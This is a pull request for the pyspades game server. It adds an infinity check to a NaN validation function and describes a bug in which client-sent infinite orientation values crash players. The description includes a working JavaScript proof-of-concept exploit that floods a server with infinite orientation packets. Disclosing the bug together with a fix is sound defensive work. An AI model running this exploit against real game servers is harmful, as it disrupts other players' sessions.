### PR TITLE
Fix for infinity value causing crashes on players

### DIFF
--- a/pyspades/player.py
+++ b/pyspades/player.py
@@ -40,7 +40,7 @@ tc_data = loaders.TCState()
 
 def check_nan(*values) -> bool:
     for value in values:
-        if math.isnan(value):
+        if math.isnan(value) or math.isinf(value):
             return True
     return False
 


### PR DESCRIPTION
This is related to https://github.com/piqueserver/piqueserver/pull/759 (found by burner again).
Players are able to send infinity values to the server through orientationdata, and server will accept it, when server sends the next worldupdate orientation will be NaN, and if you combine it with jumping+walking to right, server will set the position (x and y) to NaN too.

So, for fixing it we add another check in the check_nan function to check for infinity, since infinity will be interpreted as a NaN at the end.

Here is the exploit using aos.js:
```js
const AoS = require("aos.js");
const client = new AoS.Client();

client.on("StateData", () => {
	client.joinGame({team: 1});
	setTimeout(() => {
		setInterval(() => {
			letsCrash();
		}, 500);
	}, 8000);
})

client.on("WorldUpdate", (fields) => {
	let lid = client.localPlayerId;

	if (lid) {
		console.log("Pos x:", fields[`player_${lid}_pos_x`]);
		console.log("Pos y:", fields[`player_${lid}_pos_y`]);
		console.log("Pos z:",fields[`player_${lid}_pos_z`]);
		console.log("ori x:",fields[`player_${lid}_ori_x`]);
		console.log("ori y:",fields[`player_${lid}_ori_y`]);
		console.log("ori z:",fields[`player_${lid}_ori_z`]);
		console.log("-----------------")
	}
})

function letsCrash() {
	let ori = new AoS.Packets.OrientationData();
	ori.setValue("x", Number.POSITIVE_INFINITY);
	ori.setValue("y", Number.POSITIVE_INFINITY);
	ori.setValue("z", Number.POSITIVE_INFINITY);

	client.sendPacket(ori.encodeInfos());
	client.setWalkInputs({right: true, jump: true});
}
client.connect("aos://16777343:32887");
```